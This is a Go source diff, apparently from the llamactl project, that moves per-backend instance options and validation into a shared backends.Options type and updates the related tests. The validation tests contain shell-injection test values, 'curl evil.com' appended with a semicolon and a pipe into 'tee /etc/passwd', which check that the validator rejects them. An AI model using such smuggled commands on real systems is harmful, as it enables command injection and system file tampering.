manager.NewInstanceManager(backendConfig, cfg, map[string]config.NodeConfig{}, "main") options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: 
"/path/to/model.gguf", + Port: 8080, + }, }, } @@ -133,9 +134,11 @@ func TestConcurrentAccess(t *testing.T) { go func(index int) { defer wg.Done() options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } instanceName := fmt.Sprintf("concurrent-test-%d", index) @@ -170,9 +173,11 @@ func TestShutdown(t *testing.T) { // Create test instance options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } _, err := mgr.CreateInstance("test-instance", options) @@ -231,11 +236,13 @@ func TestAutoRestartDisabledInstanceStatus(t *testing.T) { autoRestart := false options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, AutoRestart: &autoRestart, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } diff --git a/pkg/manager/operations.go b/pkg/manager/operations.go index 7129794..fd150e8 100644 --- a/pkg/manager/operations.go +++ b/pkg/manager/operations.go @@ -2,7 +2,6 @@ package manager import ( "fmt" - "llamactl/pkg/backends" "llamactl/pkg/instance" "llamactl/pkg/validation" "os" @@ -86,7 +85,7 @@ func (im *instanceManager) CreateInstance(name string, options *instance.Options return nil, err } - err = validation.ValidateInstanceOptions(options) + err = options.BackendOptions.ValidateInstanceOptions() if err != nil { return nil, err } @@ -232,7 +231,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.Options return nil, fmt.Errorf("instance options cannot be nil") } - err := validation.ValidateInstanceOptions(options) + err := options.BackendOptions.ValidateInstanceOptions() if err != nil { return nil, err } @@ -493,39 +492,12 @@ func (im *instanceManager) GetInstanceLogs(name string, numLines int) (string, e // getPortFromOptions extracts the port from backend-specific options func (im *instanceManager) getPortFromOptions(options *instance.Options) int { - switch options.BackendType { - case backends.BackendTypeLlamaCpp: - if options.LlamaServerOptions != nil { - return options.LlamaServerOptions.Port - } - case backends.BackendTypeMlxLm: - if options.MlxServerOptions != nil { - return options.MlxServerOptions.Port - } - case backends.BackendTypeVllm: - if options.VllmServerOptions != nil { - return options.VllmServerOptions.Port - } - } - return 0 + return options.BackendOptions.GetPort() } // setPortInOptions sets the port in backend-specific options func (im *instanceManager) setPortInOptions(options *instance.Options, port int) { - switch options.BackendType { - case backends.BackendTypeLlamaCpp: - if options.LlamaServerOptions != nil { - options.LlamaServerOptions.Port = port - } - case backends.BackendTypeMlxLm: - if options.MlxServerOptions != nil { - options.MlxServerOptions.Port = port - } - case backends.BackendTypeVllm: - if options.VllmServerOptions != nil { - 
options.VllmServerOptions.Port = port - } - } + options.BackendOptions.SetPort(port) } // assignAndValidatePort assigns a port if not specified and validates it's not in use diff --git a/pkg/manager/operations_test.go b/pkg/manager/operations_test.go index 56b8b3b..3a0651d 100644 --- a/pkg/manager/operations_test.go +++ b/pkg/manager/operations_test.go @@ -2,7 +2,6 @@ package manager_test import ( "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" "llamactl/pkg/config" "llamactl/pkg/instance" "llamactl/pkg/manager" @@ -14,10 +13,12 @@ func TestCreateInstance_Success(t *testing.T) { manager := createTestManager() options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, }, } @@ -41,9 +42,11 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) { // Test duplicate names mngr := createTestManager() options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -97,9 +100,11 @@ func TestPortManagement(t *testing.T) { // Test auto port assignment options1 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -115,10 +120,12 @@ func TestPortManagement(t *testing.T) { // Test port conflict detection options2 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model2.gguf", - Port: port1, // Same port - should conflict + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model2.gguf", + Port: port1, // Same port - should conflict + }, }, } @@ -133,10 +140,12 @@ func TestPortManagement(t *testing.T) { // Test port release on deletion specificPort := 8080 options3 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: specificPort, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: specificPort, + }, }, } @@ -161,9 +170,11 @@ func TestInstanceOperations(t *testing.T) { manager := createTestManager() options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -184,10 +195,12 @@ func TestInstanceOperations(t *testing.T) { // Update instance newOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: 
"/path/to/new-model.gguf", - Port: 8081, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/new-model.gguf", + Port: 8081, + }, }, } @@ -195,8 +208,8 @@ func TestInstanceOperations(t *testing.T) { if err != nil { t.Fatalf("UpdateInstance failed: %v", err) } - if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" { - t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model) + if updated.GetOptions().BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" { + t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().BackendOptions.LlamaServerOptions.Model) } // List instances diff --git a/pkg/manager/timeout_test.go b/pkg/manager/timeout_test.go index 8c30d5d..d1c3a47 100644 --- a/pkg/manager/timeout_test.go +++ b/pkg/manager/timeout_test.go @@ -2,7 +2,6 @@ package manager_test import ( "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" "llamactl/pkg/config" "llamactl/pkg/instance" "llamactl/pkg/manager" @@ -36,9 +35,11 @@ func TestTimeoutFunctionality(t *testing.T) { idleTimeout := 1 // 1 minute options := &instance.Options{ IdleTimeout: &idleTimeout, - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, } @@ -85,9 +86,11 @@ func TestTimeoutFunctionality(t *testing.T) { // Test that instance without timeout doesn't timeout noTimeoutOptions := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, }, // No IdleTimeout set } @@ -116,25 +119,31 @@ func TestEvictLRUInstance_Success(t *testing.T) { // Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic) options1 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model1.gguf", - }, IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0 + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model1.gguf", + }, + }, } options2 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model2.gguf", - }, IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0 + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model2.gguf", + }, + }, } options3 := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: "/path/to/model3.gguf", - }, IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0 + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: "/path/to/model3.gguf", + }, + }, } inst1, err := manager.CreateInstance("instance-1", 
options1) @@ -198,11 +207,13 @@ func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) { // Helper function to create instances with different timeout configurations createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance { options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ - Model: model, - }, IdleTimeout: timeout, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ + Model: model, + }, + }, } inst, err := manager.CreateInstance(name, options) if err != nil { diff --git a/pkg/server/handlers_backends.go b/pkg/server/handlers_backends.go index 6fa833c..1ae2835 100644 --- a/pkg/server/handlers_backends.go +++ b/pkg/server/handlers_backends.go @@ -4,9 +4,6 @@ import ( "encoding/json" "fmt" "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" - "llamactl/pkg/backends/mlx" - "llamactl/pkg/backends/vllm" "llamactl/pkg/instance" "net/http" "os/exec" @@ -43,7 +40,7 @@ func (h *Handler) LlamaCppProxy(onDemandStart bool) http.HandlerFunc { return } - if options.BackendType != backends.BackendTypeLlamaCpp { + if options.BackendOptions.BackendType != backends.BackendTypeLlamaCpp { http.Error(w, "Instance is not a llama.cpp server.", http.StatusBadRequest) return } @@ -130,14 +127,16 @@ func (h *Handler) ParseLlamaCommand() http.HandlerFunc { writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty") return } - llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command) + llamaOptions, err := backends.ParseLlamaCommand(req.Command) if err != nil { writeError(w, http.StatusBadRequest, "parse_error", err.Error()) return } options := &instance.Options{ - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: llamaOptions, + BackendOptions: backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: llamaOptions, + }, } w.Header().Set("Content-Type", "application/json") if err := json.NewEncoder(w).Encode(options); err != nil { @@ -179,7 +178,7 @@ func (h *Handler) ParseMlxCommand() http.HandlerFunc { return } - mlxOptions, err := mlx.ParseMlxCommand(req.Command) + mlxOptions, err := backends.ParseMlxCommand(req.Command) if err != nil { writeError(w, http.StatusBadRequest, "parse_error", err.Error()) return @@ -189,8 +188,10 @@ func (h *Handler) ParseMlxCommand() http.HandlerFunc { backendType := backends.BackendTypeMlxLm options := &instance.Options{ - BackendType: backendType, - MlxServerOptions: mlxOptions, + BackendOptions: backends.Options{ + BackendType: backendType, + MlxServerOptions: mlxOptions, + }, } w.Header().Set("Content-Type", "application/json") @@ -233,7 +234,7 @@ func (h *Handler) ParseVllmCommand() http.HandlerFunc { return } - vllmOptions, err := vllm.ParseVllmCommand(req.Command) + vllmOptions, err := backends.ParseVllmCommand(req.Command) if err != nil { writeError(w, http.StatusBadRequest, "parse_error", err.Error()) return @@ -242,8 +243,10 @@ func (h *Handler) ParseVllmCommand() http.HandlerFunc { backendType := backends.BackendTypeVllm options := &instance.Options{ - BackendType: backendType, - VllmServerOptions: vllmOptions, + BackendOptions: backends.Options{ + BackendType: backendType, + VllmServerOptions: vllmOptions, + }, } w.Header().Set("Content-Type", "application/json") diff --git a/pkg/testutil/helpers.go b/pkg/testutil/helpers.go index 7b7fe0c..73c83c5 100644 --- 
a/pkg/testutil/helpers.go +++ b/pkg/testutil/helpers.go @@ -1,5 +1,7 @@ package testutil +import "slices" + // Helper functions for pointer fields func BoolPtr(b bool) *bool { return &b @@ -8,3 +10,23 @@ func BoolPtr(b bool) *bool { func IntPtr(i int) *int { return &i } + +// Helper functions for testing command arguments + +// Contains checks if a slice contains a specific item +func Contains(slice []string, item string) bool { + return slices.Contains(slice, item) +} + +// ContainsFlagWithValue checks if args contains a flag followed by a specific value +func ContainsFlagWithValue(args []string, flag, value string) bool { + for i, arg := range args { + if arg == flag { + // Check if there's a next argument and it matches the expected value + if i+1 < len(args) && args[i+1] == value { + return true + } + } + } + return false +} diff --git a/pkg/validation/validation.go b/pkg/validation/validation.go index 6d6638d..ca7b8ec 100644 --- a/pkg/validation/validation.go +++ b/pkg/validation/validation.go @@ -2,8 +2,6 @@ package validation import ( "fmt" - "llamactl/pkg/backends" - "llamactl/pkg/instance" "reflect" "regexp" ) @@ -24,8 +22,8 @@ var ( type ValidationError error -// validateStringForInjection checks if a string contains dangerous patterns -func validateStringForInjection(value string) error { +// ValidateStringForInjection checks if a string contains dangerous patterns +func ValidateStringForInjection(value string) error { for _, pattern := range dangerousPatterns { if pattern.MatchString(value) { return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value)) @@ -34,83 +32,8 @@ func validateStringForInjection(value string) error { return nil } -// ValidateInstanceOptions performs validation based on backend type -func ValidateInstanceOptions(options *instance.Options) error { - if options == nil { - return ValidationError(fmt.Errorf("options cannot be nil")) - } - - // Validate based on backend type - switch options.BackendType { - case backends.BackendTypeLlamaCpp: - return validateLlamaCppOptions(options) - case backends.BackendTypeMlxLm: - return validateMlxOptions(options) - case backends.BackendTypeVllm: - return validateVllmOptions(options) - default: - return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType)) - } -} - -// validateLlamaCppOptions validates llama.cpp specific options -func validateLlamaCppOptions(options *instance.Options) error { - if options.LlamaServerOptions == nil { - return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend")) - } - - // Use reflection to check all string fields for injection patterns - if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil { - return err - } - - // Basic network validation for port - if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 { - return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port)) - } - - return nil -} - -// validateMlxOptions validates MLX backend specific options -func validateMlxOptions(options *instance.Options) error { - if options.MlxServerOptions == nil { - return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend")) - } - - if err := validateStructStrings(options.MlxServerOptions, ""); err != nil { - return err - } - - // Basic network validation for port - if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 { - return ValidationError(fmt.Errorf("invalid port range: 
%d", options.MlxServerOptions.Port)) - } - - return nil -} - -// validateVllmOptions validates vLLM backend specific options -func validateVllmOptions(options *instance.Options) error { - if options.VllmServerOptions == nil { - return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend")) - } - - // Use reflection to check all string fields for injection patterns - if err := validateStructStrings(options.VllmServerOptions, ""); err != nil { - return err - } - - // Basic network validation for port - if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 { - return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port)) - } - - return nil -} - -// validateStructStrings recursively validates all string fields in a struct -func validateStructStrings(v any, fieldPath string) error { +// ValidateStructStrings recursively validates all string fields in a struct +func ValidateStructStrings(v any, fieldPath string) error { val := reflect.ValueOf(v) if val.Kind() == reflect.Ptr { val = val.Elem() @@ -136,21 +59,21 @@ func validateStructStrings(v any, fieldPath string) error { switch field.Kind() { case reflect.String: - if err := validateStringForInjection(field.String()); err != nil { + if err := ValidateStringForInjection(field.String()); err != nil { return ValidationError(fmt.Errorf("field %s: %w", fieldName, err)) } case reflect.Slice: if field.Type().Elem().Kind() == reflect.String { for j := 0; j < field.Len(); j++ { - if err := validateStringForInjection(field.Index(j).String()); err != nil { + if err := ValidateStringForInjection(field.Index(j).String()); err != nil { return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err)) } } } case reflect.Struct: - if err := validateStructStrings(field.Interface(), fieldName); err != nil { + if err := ValidateStructStrings(field.Interface(), fieldName); err != nil { return err } } diff --git a/pkg/validation/validation_test.go b/pkg/validation/validation_test.go index 759ebc3..e447666 100644 --- a/pkg/validation/validation_test.go +++ b/pkg/validation/validation_test.go @@ -2,9 +2,6 @@ package validation_test import ( "llamactl/pkg/backends" - "llamactl/pkg/backends/llamacpp" - "llamactl/pkg/instance" - "llamactl/pkg/testutil" "llamactl/pkg/validation" "strings" "testing" @@ -58,13 +55,11 @@ func TestValidateInstanceName(t *testing.T) { } func TestValidateInstanceOptions_NilOptions(t *testing.T) { - err := validation.ValidateInstanceOptions(nil) + var opts backends.Options + err := opts.ValidateInstanceOptions() if err == nil { t.Error("Expected error for nil options") } - if !strings.Contains(err.Error(), "options cannot be nil") { - t.Errorf("Expected 'options cannot be nil' error, got: %v", err) - } } func TestValidateInstanceOptions_PortValidation(t *testing.T) { @@ -83,14 +78,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { - options := &instance.Options{ + options := backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Port: tt.port, }, } - err := validation.ValidateInstanceOptions(options) + err := options.ValidateInstanceOptions() if (err != nil) != tt.wantErr { t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr) } @@ -137,14 +132,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) { for _, tt := 
range tests { t.Run(tt.name, func(t *testing.T) { // Test with Model field (string field) - options := &instance.Options{ + options := backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Model: tt.value, }, } - err := validation.ValidateInstanceOptions(options) + err := options.ValidateInstanceOptions() if (err != nil) != tt.wantErr { t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr) } @@ -175,14 +170,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { // Test with Lora field (array field) - options := &instance.Options{ + options := backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Lora: tt.array, }, } - err := validation.ValidateInstanceOptions(options) + err := options.ValidateInstanceOptions() if (err != nil) != tt.wantErr { t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr) } @@ -194,14 +189,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { // Test that injection in any field is caught tests := []struct { name string - options *instance.Options + options backends.Options wantErr bool }{ { name: "injection in model field", - options: &instance.Options{ + options: backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Model: "safe.gguf", HFRepo: "microsoft/model; curl evil.com", }, @@ -210,9 +205,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { }, { name: "injection in log file", - options: &instance.Options{ + options: backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Model: "safe.gguf", LogFile: "/tmp/log.txt | tee /etc/passwd", }, @@ -221,9 +216,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { }, { name: "all safe fields", - options: &instance.Options{ + options: backends.Options{ BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + LlamaServerOptions: &backends.LlamaServerOptions{ Model: "/path/to/model.gguf", HFRepo: "microsoft/DialoGPT-medium", LogFile: "/tmp/llama.log", @@ -237,7 +232,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { - err := validation.ValidateInstanceOptions(tt.options) + err := tt.options.ValidateInstanceOptions() if (err != nil) != tt.wantErr { t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr) } @@ -247,12 +242,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { func TestValidateInstanceOptions_NonStringFields(t *testing.T) { // Test that non-string fields don't interfere with validation - options := &instance.Options{ - AutoRestart: testutil.BoolPtr(true), - MaxRestarts: testutil.IntPtr(5), - RestartDelay: testutil.IntPtr(10), - BackendType: backends.BackendTypeLlamaCpp, - LlamaServerOptions: &llamacpp.LlamaServerOptions{ + options := backends.Options{ + BackendType: backends.BackendTypeLlamaCpp, + LlamaServerOptions: &backends.LlamaServerOptions{ Port: 8080, GPULayers: 32, 
CtxSize: 4096, @@ -264,7 +256,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) { }, } - err := validation.ValidateInstanceOptions(options) + err := options.ValidateInstanceOptions() if err != nil { t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err) }
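
Note: a minimal sketch of how callers invoke the relocated validation after this refactor, assuming ValidateInstanceOptions is now a method on backends.Options that runs the injection and port checks above, as the updated tests suggest; the main package and printed message are illustrative, not part of the patch:

package main

import (
	"fmt"

	"llamactl/pkg/backends"
)

func main() {
	// Options are built exactly as in the updated tests: the typed
	// backend options now live on backends.Options rather than
	// instance.Options.
	opts := backends.Options{
		BackendType: backends.BackendTypeLlamaCpp,
		LlamaServerOptions: &backends.LlamaServerOptions{
			Model: "model.gguf; curl evil.com", // injection attempt; should be rejected
			Port:  8080,
		},
	}

	// Validation is a method on the options value instead of the old
	// package-level validation.ValidateInstanceOptions(*instance.Options).
	if err := opts.ValidateInstanceOptions(); err != nil {
		fmt.Println("validation failed:", err)
	}
}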